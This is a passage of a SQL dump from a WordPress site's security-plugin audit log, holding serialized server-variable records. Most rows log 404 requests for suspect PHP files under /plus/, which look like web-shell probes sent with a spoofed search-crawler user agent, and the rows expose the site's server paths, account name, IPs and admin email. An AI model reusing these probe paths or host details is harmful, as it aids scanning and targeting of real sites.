gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1570100559.2341060638427734375000\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1570100559.2341060638427734375000\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"50476\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1570100559.2341060638427734375000\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZXVTykdduukwg9cr3gVsQAAANY\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZXVTykdduukwg9cr3gVsQAAANY\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"50476\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZXVTykdduukwg9cr3gVsQAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570101466.7894\";s:12:\"REQUEST_TIME\";s:10:\"1570101466\";}}','notice','2019-10-03 11:17:57','2019-10-03 11:17:48',35226776,35480000,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1570100559.2341060638427734375000',1,0,'103.6.198.69'),(27710,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/plus/av.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"102.197.163.209\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=42a06bd12d8445df546d07aa55ab8127\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"102.197.163.209\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/av.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/av.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycorDTiPzaBc@31OEzxwAAAQs\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/av.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/av.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycorDTiPzaBc@31OEzxwAAAQs\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/av.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/plus/av.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycorDTiPzaBc@31OEzxwAAAQs\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"62812\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/av.php\";s:10:\"SCRIPT_URL\";s:12:\"/plus/av.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycorDTiPzaBc@31OEzxwAAAQs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544802.8645\";s:12:\"REQUEST_TIME\";s:10:\"1570544802\";}}','notice','2019-10-08 14:26:44','2019-10-08 14:26:43',35054752,36854360,'https://bintara.com.my/plus/av.php',1,0,'102.197.163.209'),(27711,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/plus/backup.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"101.169.152.216\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=4e5b02521d87bfb56424c681e8413ada\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"101.169.152.216\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/backup.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/plus/backup.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycq7DTiPzaBc@31OEzzAAAAQE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/backup.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/plus/backup.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycq7DTiPzaBc@31OEzzAAAAQE\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/backup.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/plus/backup.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycq7DTiPzaBc@31OEzzAAAAQE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"63927\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/backup.php\";s:10:\"SCRIPT_URL\";s:16:\"/plus/backup.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycq7DTiPzaBc@31OEzzAAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544812.0022\";s:12:\"REQUEST_TIME\";s:10:\"1570544812\";}}','notice','2019-10-08 14:26:53','2019-10-08 14:26:52',35053800,36858088,'https://bintara.com.my/plus/backup.php',1,0,'101.169.152.216'),(27716,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/m7lrv.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"124.222.226.101\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=06d976a0f302a893a46d76e22dcfb387\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"124.222.226.101\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/m7lrv.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/m7lrv.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyc0nURUVLSjYCXpcIzJQAAAM0\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/m7lrv.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/m7lrv.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZyc0nURUVLSjYCXpcIzJQAAAM0\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/m7lrv.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/m7lrv.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZyc0nURUVLSjYCXpcIzJQAAAM0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"52214\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/m7lrv.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/m7lrv.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZyc0nURUVLSjYCXpcIzJQAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544850.2152\";s:12:\"REQUEST_TIME\";s:10:\"1570544850\";}}','notice','2019-10-08 14:27:32','2019-10-08 14:27:30',35050024,36846216,'https://bintara.com.my/plus/m7lrv.php',1,0,'124.222.226.101'),(27715,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/plus/laobiao.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"7.55.156.163\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=3ac1cf86ae86862832f52b4b1888b6f5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"7.55.156.163\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/laobiao.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/plus/laobiao.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycyXURUVLSjYCXpcIzIwAAAMQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/laobiao.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/plus/laobiao.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycyXURUVLSjYCXpcIzIwAAAMQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/laobiao.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/plus/laobiao.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycyXURUVLSjYCXpcIzIwAAAMQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"51223\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/plus/laobiao.php\";s:10:\"SCRIPT_URL\";s:17:\"/plus/laobiao.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycyXURUVLSjYCXpcIzIwAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544841.3743\";s:12:\"REQUEST_TIME\";s:10:\"1570544841\";}}','notice','2019-10-08 14:27:23','2019-10-08 14:27:21',35052936,36862944,'https://bintara.com.my/plus/laobiao.php',1,0,'7.55.156.163'),(27714,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:58:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/e7xue.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"178.43.61.49\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=b470ff69cffa570b9d851f806fa451f6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"178.43.61.49\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/e7xue.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/e7xue.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycw7DTiPzaBc@31OEz-QAAARI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/e7xue.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/e7xue.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZycw7DTiPzaBc@31OEz-QAAARI\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/e7xue.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/e7xue.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZycw7DTiPzaBc@31OEz-QAAARI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"119.187.228.206\";s:11:\"REMOTE_PORT\";s:5:\"50573\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/e7xue.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/e7xue.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZycw7DTiPzaBc@31OEz-QAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570544835.1522\";s:12:\"REQUEST_TIME\";s:10:\"1570544835\";}}','notice','2019-10-08 14:27:16','2019-10-08 